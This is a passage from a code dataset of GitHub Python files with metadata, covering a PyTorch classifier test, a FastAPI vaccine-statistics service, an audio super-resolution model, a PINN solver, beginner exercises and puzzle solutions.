writer.add_image(\"RandomCrop\",img_crop,i)\r\nprint(img_crop.shape)\r\n\r\nwriter.close()\r\n","repo_name":"neonskk/pytorchlearning","sub_path":"4、常见的lTransForms.py","file_name":"4、常见的lTransForms.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28960359173","text":"import sys\nsys.path.append('./')\n\nimport os\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom commons.data.datasets import BipartitionMatricesDataset\nfrom commons.models.cnns import CNN\nfrom commons.models.siamese_networks import VectorSiamese\nfrom commons.models.separator_classifiers import FancySeparatorEnsembleClassifier\nfrom commons.models.separator_classifiers import FancyClassifier\nfrom commons.test_utils.base import test\nfrom commons.test_utils.siamese import test_vector_siamese\nfrom commons.pytorch_utils import save_acc\n\nsiamese_flag = False\nverified_dataset = True\n\nbatch_size = 128\nbatch_interval = 800\nqbits_num = 3\nsep_ch = 16\nsep_fc_num = 4\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nif verified_dataset:\n results_dir = './results/3qbits/discord/nopptes_bisep/'\n model_dir = './paper_models/3qbits/nopptes_bisep/'\nelse:\n results_dir = './results/3qbits/discord/negativity_bisep_test/'\n model_dir = './paper_models/3qbits/negativity_bisep/'\n\nif siamese_flag:\n model_name = 'siam_cnn_class_best_val_paper'\n results_file = 'siam_cnn_class_best_val_paper.txt'\nelse:\n model_name = 'cnn_class_best_val_paper'\n results_file = 'cnn_class_best_val_paper.txt'\n\nos.makedirs(results_dir, exist_ok=True)\nos.makedirs(model_dir, exist_ok=True)\n\nmodel_path = model_dir + model_name + '.pt'\nresults_path = results_dir + results_file\n\npure_dictionary_path = './datasets/3qbits/pure_test/negativity_bipartitions.txt'\npure_root_dir = './datasets/3qbits/pure_test/matrices/'\n\nmixed_ent_dictionary_path = './datasets/3qbits/mixed_test_bal/negativity_bipartitions.txt'\nmixed_disc_dictionary_path = './datasets/3qbits/mixed_test_bal/discord_bipartitions.txt'\nmixed_root_dir = './datasets/3qbits/mixed_test_bal/matrices/'\n\ntest_pure_dataset = BipartitionMatricesDataset(pure_dictionary_path, pure_root_dir, 0.0001)\ntest_pure_loader = DataLoader(test_pure_dataset, batch_size=batch_size, shuffle=True)\n\ntest_mixed_bal_ent_dataset = BipartitionMatricesDataset(mixed_ent_dictionary_path, mixed_root_dir, 0.0001)\ntest_mixed_bal_ent_loader = DataLoader(test_mixed_bal_ent_dataset, batch_size=batch_size, shuffle=True)\n\ntest_mixed_bal_disc_dataset = BipartitionMatricesDataset(mixed_disc_dictionary_path, mixed_root_dir, 0.0001)\ntest_mixed_bal_disc_loader = DataLoader(test_mixed_bal_disc_dataset, batch_size=batch_size)\n\n\nif siamese_flag:\n model = VectorSiamese(qbits_num, test_pure_dataset.bipart_num, 3, 5, 2, 16, ratio_type='sqrt', mode='classifier', biparts_mode='all')\nelse:\n model = CNN(qbits_num, test_pure_dataset.bipart_num, 3, 5, 2, 16, ratio_type='sqrt', mode='classifier')\n\nmodel.double()\nmodel.load_state_dict(torch.load(model_path))\nprint('Model loaded')\n\ncriterion = torch.nn.BCELoss()\n\nsave_acc(results_path, '', ['Pure loss', 'Pure bal accuracy', 'Pure prob ent', 'Pure prob sep', 'Mixed disc loss', 'Mixed disc bal accuracy', 'Mixed disc prob', 'Mixed zero disc prob', 'Mixed ent loss', 'Mixed ent bal accuracy', 'Mixed ent prob', 'Mixed sep prob'], write_mode='w')\n\nif siamese_flag:\n pure_loss, pure_acc, pure_cm, pure_prob_ent, pure_prob_sep, pure_bal_acc = test_vector_siamese(model, device, test_pure_loader, criterion, \"Pure data set\", bipart='separate', negativity_ext=False, low_thresh=0.5, high_thresh=0.5, decision_point=0.5, balanced_acc=True, confusion_matrix=True, confusion_matrix_dim=2)\n mixed_disc_loss, mixed_disc_acc, mixed_disc_cm, mixed_disc_prob, mixed_zero_disc_prob, mixed_disc_bal_acc = test_vector_siamese(model, device, test_mixed_bal_disc_loader, criterion, \"Mixed data set\", bipart='separate', negativity_ext=False, low_thresh=0.5, high_thresh=0.5, decision_point=0.5, balanced_acc=True, confusion_matrix=True, confusion_matrix_dim=2)\n mixed_ent_loss, mixed_ent_acc, mixed_ent_cm, mixed_ent_prob, mixed_sep_prob, mixed_ent_bal_acc = test_vector_siamese(model, device, test_mixed_bal_ent_loader, criterion, \"Mixed data set\", bipart='separate', negativity_ext=False, low_thresh=0.5, high_thresh=0.5, decision_point=0.5, balanced_acc=True, confusion_matrix=True, confusion_matrix_dim=2)\n \nelse:\n pure_loss, pure_acc, pure_cm, pure_prob_ent, pure_prob_sep, pure_bal_acc = test(model, device, test_pure_loader, criterion, \"Pure data set\", bipart=True, confusion_matrix=True, confusion_matrix_dim=2, balanced_acc=True)\n mixed_disc_loss, mixed_disc_acc, mixed_disc_cm, mixed_disc_prob, mixed_zero_disc_prob, mixed_disc_bal_acc = test(model, device, test_mixed_bal_disc_loader, criterion, \"Mixed data set\", bipart=True, confusion_matrix=True, confusion_matrix_dim=2, balanced_acc=True)\n mixed_ent_loss, mixed_ent_acc, mixed_ent_cm, mixed_ent_prob, mixed_sep_prob, mixed_ent_bal_acc = test(model, device, test_mixed_bal_ent_loader, criterion, \"Mixed data set\", bipart=True, confusion_matrix=True, confusion_matrix_dim=2, balanced_acc=True)\n\nsave_acc(results_path, '', [pure_loss, pure_bal_acc, pure_prob_ent, pure_prob_sep, mixed_disc_loss, mixed_disc_bal_acc, mixed_disc_prob, mixed_zero_disc_prob, mixed_ent_loss, mixed_ent_bal_acc, mixed_ent_prob, mixed_sep_prob])","repo_name":"Maticraft/quantum_correlations","sub_path":"run/test_bipart_classifier_on_discord.py","file_name":"test_bipart_classifier_on_discord.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4427755541","text":"from fastapi import FastAPI\nfrom typing import Optional\nimport pandas as pd\nimport numpy as np\nfrom utils import grab_info_by_state\n\n# https://towardsdatascience.com/create-your-first-rest-api-in-fastapi-e728ae649a60\n\n\nAPI_VERSION = 1.0\n\ndef _fetch_data():\n print(\"Reading vaccine information\")\n url = \"https://sisa.msal.gov.ar/datos/descargas/covid-19/files/Covid19VacunasAgrupadas.csv.zip\"\n df = pd.read_csv(url)\n print(\"Finished reading\")\n return df\n\n\ndef fetch_recepcion_de_vacunas():\n print(\"Reading reception data\")\n # url = \"http://datos.salud.gob.ar/dataset/7e69d4b4-535d-4d4d-ad4a-362b6a1f4468/resource/d2851fa6-b105-4f15-b352-dd3d792bd526/download/2021-06-29-actas-de-recepcion-vacunas.xlsx\"\n # df = pd.read_excel(url)\n df = pd.read_csv(\"2021-06-29-actas-de-recepcion-vacunas.csv\")\n print(\"Finish Reading\")\n return df\n\n\napp = FastAPI()\n\nvaccine_df = _fetch_data()\nvaccine_reception = fetch_recepcion_de_vacunas()\n\n\n@app.get(\"/\")\ndef home():\n return {\"Greeting\": \"Hello! Go to /docs if you are lost :)\"}\n\n\n@app.get(\"/vaccines/reception_qty\")\ndef get_reception_vaccines_qty():\n \"\"\"\n Get number of vaccines that arrived in the country\n \"\"\"\n qty = vaccine_reception[\"dosis_recibidas\"].sum()\n aux = {\"dosis_recibidas\": int(qty)}\n return aux\n\n\n@app.get(\"/vaccines/qty\")\ndef get_vaccines_qty():\n \"\"\"\n Get administered vaccines quantity by name and total and its percentage\n \"\"\"\n qty = vaccine_df.groupby(\"vacuna_nombre\").apply(\n lambda s: pd.Series(\n {\n \"Cantidad\": (\n s[\"primera_dosis_cantidad\"] + s[\"segunda_dosis_cantidad\"]\n ).sum()\n }\n )\n )\n qty[\"Porcentaje\"] = (qty[\"Cantidad\"] / qty[\"Cantidad\"].sum()) * 100\n qty = qty.sort_values(by=[\"Porcentaje\"], ascending=False)\n qty.loc[\"Total\"] = qty.sum()\n return qty\n\n\n@app.get(\"/vaccines/doses\")\ndef get_number_vaccines_per_dose():\n \"\"\"\n Get the number of doses for first and second doses of vaccines\n \"\"\"\n total_poblacion = 45808747\n prim_dosis = sum(vaccine_df[\"primera_dosis_cantidad\"])\n sec_dosis = sum(vaccine_df[\"segunda_dosis_cantidad\"])\n aux = {\n \"primera_dosis\": int(prim_dosis),\n \"segunda_dosis\": int(sec_dosis),\n \"total_sin_vacunar\": int(total_poblacion - prim_dosis - sec_dosis),\n }\n return aux\n\n\n@app.get(\"/vaccines/by_state/{dose_num}\")\ndef get_vaccines_by_state(dose_num: int):\n \"\"\"\n Get the vaccine information by state of the `{dose_num}` dose\n \"\"\"\n if dose_num not in [1, 2]:\n return {\"Error\": f\"{dose_num} is not a valid dose number\"}\n\n dose_col = \"primera_dosis_cantidad\" if dose_num == 1 else \"segunda_dosis_cantidad\"\n return grab_info_by_state(vaccine_df, dose_col)\n\n\n@app.get(\"/vaccines/by_date\")\ndef get_vaccines_by_date():\n \"\"\"\n Get the vaccine information by date. Returns data for every vaccine and both doses.\n Response Format:\n An `array` where each element has as array with the following format:\n ```\n [date, vaccine_name, dose_num, qty]\n ```\n \"\"\"\n df = pd.read_csv(\"dates_vaccines_qty.csv\")\n\n response = dict()\n response[\"header\"] = list(df.columns.to_numpy())\n data = []\n for index in range(0, len(df)):\n tmp_arr = list(df.iloc[index].to_numpy())\n tmp_arr[2] = int(tmp_arr[2])\n data.append(tmp_arr)\n\n response[\"content\"] = data\n return response\n\n\n@app.get(\"/version\")\ndef get_version():\n \"\"\"\n Return the current version of the API.\n Serves also as a \"health\" endpoint to make sure the API is up.\n \"\"\"\n return {\"version\": f\"{API_VERSION}\"}\n","repo_name":"ignacioVidaurreta/vacunas-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5271256155","text":"import tensorflow as tf\nfrom functools import partial\nfrom tensorflow.keras.layers import Add, Conv1D, Lambda, PReLU, Conv2DTranspose\nfrom tensorflow.keras import Input\nfrom tensorflow.keras.models import Model\nfrom model.common import pixel_shuffle, denormalize, normalize, normalize_1, denormalize_1\n\ndef edsr(scale, num_filters=32, res_blocks=[9,9,9,5,5,5,3,3], res_block_scaling=None, summary=True):\n assert type(res_blocks) == list, 'res_blocks should be list type'\n\n print(f'Number of Residual blocks {len(res_blocks)}')\n\n x_in = Input(shape=(None, 1))\n # x = Lambda(normalize, name='Normalize')(x_in)\n x = b = Conv1D(num_filters, 9, padding='same')(x_in)\n\n # residual blocks\n for f in res_blocks:\n x = residual_block2(x, num_filters, f, res_block_scaling)\n\n b = Conv1D(num_filters, 3, padding='same')(b)\n x = Add()([x, b])\n\n x = upsample(x, scale, num_filters)\n x = Conv1D(1, 3, padding='same')(x)\n # x = Lambda(denormalize, name='Denormalize')(x)\n\n model = Model(x_in, x)\n\n if summary:\n model.summary()\n\n return model\n\ndef edsr2(scale, num_filters=32, res_blocks=[9,9,9,5,5,5,3,3], res_block_scaling=None, summary=True):\n assert type(res_blocks) == list, 'res_blocks should be list type'\n\n print(f'Number of Residual blocks {len(res_blocks)}')\n\n x_in = Input(shape=(None, 1))\n # x = Lambda(normalize, name='Normalize')(x_in)\n x = b = Conv1D(num_filters, 9, padding='same')(x_in)\n\n # residual blocks\n for f in res_blocks:\n x = residual_block(x, num_filters, f, res_block_scaling)\n\n b = Conv1D(num_filters, 3, padding='same')(b)\n x = Add()([x, b])\n\n x = upsample(x, scale, num_filters)\n x = Conv1D(num_filters//2, 3, padding='same', activation='tanh', kernel_initializer='glorot_uniform')(x)\n # x = PReLU(alpha_initializer='zeros', shared_axes=[1])(x)\n x = Conv1D(8, 3, padding='same')(x)\n x = Conv1D(1, 3, padding='same')(x)\n # x = Lambda(denormalize, name='Denormalize')(x)\n\n model = Model(x_in, x)\n\n if summary:\n model.summary()\n\n return model\n\ndef residual_block(x_in, num_filters, f, scaling):\n x = Conv1D(num_filters, f, padding='same', activation='tanh', kernel_initializer='glorot_uniform')(x_in)\n # x = PReLU(alpha_initializer='zeros', shared_axes=[1])(x)\n x = Conv1D(num_filters, f, padding='same')(x)\n x = Conv1D(num_filters, f, padding='same')(x)\n if scaling:\n x_in = Lambda(lambda x : x * (1-scaling))(x_in)\n x = Lambda(lambda x : x * scaling)(x)\n x = Add()([x, x_in])\n return x\n\ndef residual_block2(x_in, num_filters, f, scaling):\n x1 = x2 = x_in\n # Main branch(auto encoder)\n x1 = Conv1D(num_filters, f, padding='same', activation='tanh')(x1)\n x1 = Conv1D(num_filters, f, padding='same', strides=2)(x1)\n x1 = Conv1D(num_filters, f, padding='same')(x1)\n x1 = Conv1D(num_filters, f, padding='same', strides=2)(x1)\n x1 = Conv1D(num_filters, f, padding='same')(x1)\n x1 = Conv1DTranspose(x1, num_filters, f, 2, 'SAME', [1,0])\n x1 = Conv1DTranspose(x1, num_filters, f, 2, 'SAME', [1,0])\n\n # Branch_1\n x2 = Conv1D(num_filters, f, padding='same', activation='tanh')(x2)\n # x2 = PReLU(alpha_initializer='zeros', shared_axes=[1])(x2)\n x2 = Conv1D(num_filters, f, padding='same')(x2)\n if scaling:\n x1 = Lambda(lambda x : x * scaling)(x1)\n x2 = Lambda(lambda x : x * scaling)(x2)\n x_in = Lambda(lambda x : x * scaling)(x_in)\n\n x = Add()([x1, x2, x_in])\n return x\n\ndef Conv1DTranspose(x, filters, kernel_size, strides=2, padding='same', output_padding=[2,1]):\n x = Lambda(lambda x : tf.expand_dims(x, axis=2))(x)\n x = Conv2DTranspose(filters=filters, kernel_size=(kernel_size, 1), strides=(strides,1), padding=padding, output_padding=output_padding)(x)\n x = Lambda(lambda x : tf.squeeze(x, axis=2))(x)\n return x\n\n\ndef upsample(x, scale, num_filters):\n def upsample_1(x, scale, **kwargs):\n x = Conv1D(num_filters * scale, 3, padding='same', **kwargs)(x)\n return Lambda(partial(pixel_shuffle, scale=scale))(x)\n\n if scale == 2:\n x = upsample_1(x, scale, name='conv1d_1_scale_2')\n elif scale == 3:\n x = upsample_1(x, scale, name='conv1d_1_scale_3')\n else:\n x = upsample_1(x, 2, name='conv1d_1_scale_2')\n x = upsample_1(x, 2, name='conv1d_2_scale_2')\n\n return x\n","repo_name":"BluePinetree/Audio-Super-Resolution","sub_path":"model/edsr.py","file_name":"edsr.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29997924455","text":"# Criar um programa que receba 5 notas de um aluno, armazenando-as em uma lista. Criar uma função que receba como parâmetro a lista de notas, e retorne a média aritmética.\nimport random\n\n\ndef CalculoMedia(nota):\n soma = 0\n for x in range(0, len(nota)):\n soma = soma+nota[x]\n media = soma/len(nota)\n return media\n\n\nNotas = []\nfor y in range(0, 5):\n Notas.append(float(input(f\"Digita a nota {y+1}: \")))\nResultado = CalculoMedia(Notas)\nprint(f\"A média é: {round(Resultado, 3)}\")\n# Criar um programa que receba o nome de 10 pessoas e classifique em ordem crescente.\nNomes = [\"João\", \"Marcelo\", \"Leonardo\", \"Franca\", \"Giovana\",\n \"Milena\", \"José\", \"Rafael\", \"Kayque\", \"David\"]\nprint(sorted(Nomes))\n# Dado um número real X e um número natural K, calcular a potência X elevado a K através de produtos sucessivos. x k = x.x.x.x. ...... x\nx = float(input(\"Digita um número: \"))\nk = int(input(\"Digite o número expoente: \"))\nif x == 0 or x == 1:\n xk = x\nelse:\n xk = x**k\nprint(f\"O resultado é: {xk}\")\n# Com relação a listas, Python dispõe de métodos específicos para a realização das diversas atividades referentes a lista. Descreva qual a forma de executar cada uma das atividades abaixo descritas, usando as estruturas de listas em Python e, quando houver, o método utilizado.\n# Para fins de exemplo, considere uma lista com 10 elementos de nome lista e outra lista com 5 elementos de nome lista2 para exemplificar o uso.\nLista_1 = [\"João\", \"Marcelo\", \"Leonardo\", \"Franca\",\n \"Giovana\", \"Milena\", \"José\", \"Rafael\", \"Kayque\", \"David\"]\nLista_2 = [\"Vinicius\", \"Marta\", \"Alex\", \"Greicy\", \"Arnaldo\"]\n# Acessar um elemento qualquer da lista;\nprint(random.choice(Lista_1))\nprint(random.choice(Lista_2))\n# Inserir um elemento numa posição específica da lista;\nLista_1.insert(5, \"Guilherme\")\nLista_2.insert(2, \"André\")\n# Remover um elemento de numa posição específica da lista;\nLista_1.pop(7)\nLista_2.pop(0)\n# Combinar duas listas em uma única;\nLista_Total = Lista_1+Lista_2\nprint(Lista_Total)\n# Particionar uma lista em duas;\nLista_Total.pop(2)\nLista_Total.pop(7)\nLista_Total.pop(1)\nLista_dividida = [Lista_Total[x:x + 6] for x in range(0, len(Lista_Total), 6)]\nprint(Lista_dividida)\nLista_1 = Lista_dividida[0]\nLista_2 = Lista_dividida[1]\n# Obter cópia de uma lista;\nLista_1Nova = []\nfor itens in Lista_1:\n Lista_1Nova.append(itens)\nprint(Lista_1Nova)\n# pode ser usado copy()\n# Determinar o total de elementos na lista;\nprint(len(Lista_2))\n# Ordenar elementos da lista;\nprint(sorted(Lista_1Nova))\n# Procurar um determinado elemento na lista;;\nprint(Lista_1Nova[4])\nprint(Lista_2[1])\n# Apagar uma lista.\ndel Lista_2\n# Crie um programa que receba e armazene dados estatísticos da média de notas de uma escola e armazene em uma lista. A lista deve receber tantos elementos quanto necessário até que o usuário digite 0 como a média. Neste momento, obtenha a moda da lista usando uma função e a média da lista e exiba\n\n\ndef ModaMedia(nota):\n import statistics\n soma = 0\n Moda = statistics.mode(nota)\n for x in range(0, len(nota)):\n soma = soma+nota[x]\n media = soma/len(nota)\n print(f\" A média é {round(media, 3)} e a moda é {Moda}\")\n\n\nNotas = []\ncount = 1\ncount_nota = 1\nwhile (count != 0):\n Notas.append(\n float(input(f\"Digita a nota {count_nota} ou digite zero para parar: \")))\n count = Notas[count_nota-1]\n count_nota += 1\nif 0 in Notas:\n Notas.remove(count)\n ModaMedia(Notas)\n# Crie um programa que receba dois números e ache todos os números primos existentes no intervalo entre os dois números informados.\n\n\ndef NumeroPrimo(num, num2):\n for x in range(num, num2+1):\n count_multi = 0\n for y in range(1, x+1):\n if x % y == 0:\n count_multi += 1\n if count_multi <= 2:\n print(f\"O número {x} é primo\")\n count_multi = 0\n\n\nnumero = int(input(\"Digita um número: \"))\nnumero2 = int(input(\"Digite um outro número: \"))\nNumeroPrimo(numero, numero2)\n# CRIE UM PROGRAMA QUE RECEBA O NOME DO ALUNO E SUAS 5 MÉDIAS, E DEPOIS IMPRIMA O NOME DO ALUNO,\n# SUAS MÉDIAS E A MÉDIA FINAL, QUE SERÁ CALCULADA POR UMA FUNÇÃO.\n\n\ndef CalculoMedia(nota):\n soma = 0\n for x in range(0, len(nota)):\n soma = soma+nota[x]\n media = soma/len(nota)\n return media\n\n\nnome = []\nmedia = []\nmedia_final = []\nx = 0\nwhile x < 5:\n nome.append(input(\"informe o nome do aluno: \"))\n y = 0\n while y < 5:\n media.append(int(input(\"Informe a média do aluno: \")))\n y += 1\n x += 1\n\nx = 0\nMedia_Divida_Aluno = [media[x:x + 5] for x in range(0, len(media), 5)]\nwhile x < 5:\n media_final.append(CalculoMedia(Media_Divida_Aluno[x]))\n x += 1\nx = 0\nwhile x < 5:\n print(f\"Aluno: {nome[x]}\")\n print(f\"Médias dos 5: {Media_Divida_Aluno[x]}\")\n print(f\"Média final: {media_final[x]}\")\n x += 1\n","repo_name":"guilhermehencus/Python_Estrutura_Dados","sub_path":"Exercicios_2.py","file_name":"Exercicios_2.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37877179247","text":"arr = [2, 3, 5, 2, 8, 2, 9, 2] # example array\ncount = 0 # to store the count of 2's\n\nfor num in arr:\n if num == 2:\n count += 1\n\nprint(count) # output: 4\n\n# With Function\ndef count_number(arr, num):\n count = 0\n for n in arr:\n if n == num:\n count += 1\n return count\n\narr = [2, 3, 5, 2, 8, 2, 9, 2] # example array\nnum = 2 # example number to count\nprint(count_number(arr, num)) # output: 4\n","repo_name":"NFRIDOY/Interval-of-Prime-Numbers","sub_path":"NumberCounter2.py","file_name":"NumberCounter2.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29388241505","text":"list = []\nf = open(\"datalogs.txt\")\nlist = f.readlines()\nprint(list)\nphrase = input(\"Please type phrase with 1 word replaced with --\")\nwords = phrase.split()\n#do AI thing idk\npreword = -1\nfor i in words:\n if i == \"--\":\n break\n preword += 1\npostword = 1\nfor i in words:\n if i == \"--\":\n break\n postword += 1\n\nprewordOK = True\npostwordOK = True\n\n#try Exception\ntry:\n temptry = (words[preword])\nexcept:\n prewordOK = False\n\ntry:\n temptry = (words[postword])\nexcept:\n postwordOK = False\npostcorrelation=-1\npostmatch = False\nif (postwordOK):\n for i in list:\n if(i==words[postword]):\n postmatch = True\n break\n postcorrelation += 1\n\nif (postcorrelation>-1):\n answer = list[postcorrelation]\n\nprint(answer)\n\nprint(words[preword]+words[postword])\nwords.append(\"|\")\nlist.append(input(\"hey\")+ \"\\n\")\nx = 0\nfor i in list:\n print(x)\n if list[x] == \"\\n\":\n list.pop(x)\n x += 1\nf.close\nf = open(\"datalogs.txt\",\"w\")\nprint(list)\n\n\nfor element in list:\n if (element != \"\\n\"):\n print(\"element accepted \"+element)\n f.write(element + \"\\n\")\n print(\"write\" + element)\n else:\n print(\"pass\")\nf.close\nf = open(\"datalogs.txt\")\nlist = f.readlines()\nprint(list)","repo_name":"codeman3000/ChatApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33641664036","text":"import tensorflow as tf\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\nclass PINNSolver():\n def __init__(self, model, residual_sample_points):\n self.model = model\n\n self.t = residual_sample_points[:, 0:1]\n self.x = residual_sample_points[:, 1:2]\n\n self.history = []\n self.iterations = 0\n\n def get_residual(self):\n with tf.GradientTape(persistent=True) as tape:\n tape.watch(self.t)\n tape.watch(self.x)\n\n u = self.model(tf.stack([self.t[:, 0], self.x[:, 0]], axis=1))\n u_x = tape.gradient(u, self.x)\n\n u_t = tape.gradient(u, self.t)\n u_xx = tape.gradient(u_x, self.x)\n\n del tape\n\n return self.get_raw_residual(self.t, self.x, u, u_t, u_x, u_xx)\n\n def loss(self, X, u):\n r = self.get_residual()\n phi_r = tf.reduce_mean(tf.square(r))\n\n loss = phi_r\n\n for i in range(len(X)):\n u_pred = self.model(X[i])\n loss += tf.reduce_mean(tf.square(u[i] - u_pred))\n\n return loss\n\n def get_gradient(self, X, u):\n with tf.GradientTape(persistent=True) as tape:\n tape.watch(self.model.trainable_variables)\n loss = self.loss(X, u)\n\n g = tape.gradient(loss, self.model.trainable_variables)\n del tape\n\n return loss, g\n\n def get_raw_residual(self, t, x, u, u_t, u_x, u_xx):\n viscosity = 5\n return u_t + u * u_x - viscosity * u_xx\n\n def solve(self, optimizer, X, u, N=1001):\n @tf.function\n def train_step():\n loss, grad_theta = self.get_gradient(X, u)\n\n optimizer.apply_gradients(\n zip(grad_theta, self.model.trainable_variables))\n return loss\n\n for _ in range(N):\n loss = train_step()\n\n self.current_loss = loss.numpy()\n self.callback()\n\n def callback(self):\n if self.iterations % 50 == 0:\n print('Iteration {:05d}: loss = {:10.8e}'.format(\n self.iterations, self.current_loss))\n self.history.append(self.current_loss)\n self.iterations += 1\n\n def plot_solution(self, **kwargs):\n N = 600\n t = np.linspace(\n self.model.lower_bounds[0], self.model.upper_bounds[0], N+1)\n x = np.linspace(\n self.model.lower_bounds[1], self.model.upper_bounds[1], N+1)\n T, X = np.meshgrid(t, x)\n x_grid = np.vstack([T.flatten(), X.flatten()]).T\n u_prediction = self.model(tf.cast(x_grid, \"float32\"))\n U = u_prediction.numpy().reshape(N+1, N+1)\n fig = plt.figure(figsize=(9, 6))\n ax = fig.add_subplot(111, projection='3d')\n ax.plot_surface(T, X, U, cmap='viridis', **kwargs)\n ax.set_xlabel('$t$')\n ax.set_ylabel('$x$')\n ax.set_zlabel('$u_\\\\theta(t,x)$')\n ax.view_init(35, 35)\n plt.show()\n\n def plot_loss_history(self, ax=None):\n if not ax:\n fig = plt.figure(figsize=(7, 5))\n ax = fig.add_subplot(111)\n ax.semilogy(range(len(self.history)), self.history, 'k-')\n ax.set_xlabel('$n_{epoch}$')\n ax.set_ylabel('$\\\\phi^{n_{epoch}}$')\n plt.show()\n","repo_name":"lukas90275/PINN","sub_path":"pinn_solver.py","file_name":"pinn_solver.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32279795138","text":"from typing import List\n\n# https://leetcode.com/problems/combination-sum-ii/description/\n\n# Given a collection of candidate numbers (candidates) and a target number (target),\n# find all unique combinations in candidates where the candidate numbers sum to target.\n\n# Each number in candidates may only be used once in the combination.\n\n# Note: The solution set must not contain duplicate combinations.\n\n# Example 1:\n# Input: candidates = [10,1,2,7,6,1,5], target = 8\n# Output:\n# [\n# [1,1,6],\n# [1,2,5],\n# [1,7],\n# [2,6]\n# ]\n\n# Example 2:\n# Input: candidates = [2,5,2,1,2], target = 5\n# Output:\n# [\n# [1,2,2],\n# [5]\n# ]\n\n# Constraints:\n# 1 <= candidates.length <= 100\n# 1 <= candidates[i] <= 50\n# 1 <= target <= 30\n\n\ndef combinationSum2(candidates: List[int], target: int) -> List[List[int]]:\n \"\"\"\n Time -> O(NlogN)\n Space -> O(N)\n \"\"\"\n if len(candidates) < 2:\n return [candidates] if candidates[0] == target else []\n\n combinations = []\n\n # assume not sorted\n candidates.sort()\n\n def dfs(nums, target, combination, combinations):\n if target < 0:\n return\n\n if target == 0:\n combinations.append(combination)\n return\n\n for i in range(len(nums)):\n # skip larger values than target\n if nums[i] > target:\n continue\n # skip if previous value is duplicate\n if i >= 1 and nums[i] == nums[i - 1]:\n continue\n # skip repeated value thus i+1\n dfs(nums[i + 1 :], target - nums[i], combination + [nums[i]], combinations)\n\n dfs(candidates, target, [], combinations)\n return combinations\n\n\nif __name__ == \"__main__\":\n candidates = [10, 1, 2, 7, 6, 1, 5]\n target = 8\n output = [[1, 1, 6], [1, 2, 5], [1, 7], [2, 6]]\n\n print(combinationSum2(candidates, target))\n","repo_name":"DavidNgugi/dsa-practice","sub_path":"problems/backtracking/combination_sum_2.py","file_name":"combination_sum_2.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35023223825","text":"def first(inputLines):\n score = 0\n enemyChoosesA = {'X': 3, 'Y': 6, 'Z': 0}\n enemyChoosesB = {'X': 0, 'Y': 3, 'Z': 6}\n enemyChoosesC = {'X': 6, 'Y': 0, 'Z': 3}\n selectedShape = {'X': 1, 'Y': 2, 'Z': 3}\n\n for line in inputLines:\n if line[0] == 'A':\n score += enemyChoosesA[line[2]]\n elif line[0] == 'B':\n score += enemyChoosesB[line[2]]\n elif line[0] == 'C':\n score += enemyChoosesC[line[2]]\n score += selectedShape[line[2]]\n\n print(score)\n\ndef second(inputLines):\n score = 0\n enemyChoosesA = {'X': 3, 'Y': 1, 'Z': 2}\n enemyChoosesB = {'X': 1, 'Y': 2, 'Z': 3}\n enemyChoosesC = {'X': 2, 'Y': 3, 'Z': 1}\n\n roundEnd = {'X': 0, 'Y': 3, 'Z': 6}\n\n for line in inputLines:\n if line[0] == 'A':\n score += enemyChoosesA[line[2]]\n elif line[0] == 'B':\n score += enemyChoosesB[line[2]]\n elif line[0] == 'C':\n score += enemyChoosesC[line[2]]\n score += roundEnd[line[2]]\n\n print(score)\n\nif __name__ == \"__main__\":\n with open('in.txt') as f:\n lines = f.read().splitlines()\n\n first(lines)\n second(lines)","repo_name":"krasiren/Aoc","sub_path":"2022/days 1-9/day2/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24080099390","text":"import sys\ninput = sys.stdin.readline\n\nn,m=map(int,input().split())\narr=list(map(int,input().split()))\ndp=[0]*(n+1)\ncount=0\n# for i in range(n):\n# dp[i+1]=dp[i]+arr[i]\n# for i in range(0,n+1):\n# # print(i,\"번째\")\n# for j in range(1,n-i+1):\n# if (dp[j+i] - dp[j - 1])%m==0:\n# count+=1\n# # print(dp[j+i] - dp[j - 1])\n# print(count)\n\nfor i in range(1,n+1):\n part=sum(arr[:i])\n if part%m==0:\n count+=1\n # print(i,\"번째\")\n for j in range(0,n-i):\n part=part-arr[j]+arr[j+i]\n # print(part)\n if part%m==0:\n count+=1\n # print()\nprint(count)\n\n\nimport sys\ninput = sys.stdin.readline\nn, m = map(int, input().split())\nnum = list(map(int, input().split())) + [0]\nr = [0] * m\n\nfor i in range(n):\n num[i] += num[i - 1]\n r[num[i] % m] += 1\n\ncnt = r[0]\n\nfor i in r:\n cnt += i * (i - 1) // 2\n\nprint(cnt)","repo_name":"Leesungsup/algo-test","sub_path":"나머지합.py","file_name":"나머지합.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"45315411306","text":"import jwt\nimport yaml\n\ndef get_token_payload(token):\n payload = dict()\n try:\n with open('./data/token/test.conf', 'r') as fp:\n config = yaml.load(fp).get('encryption')\n payload = jwt.decode(token, 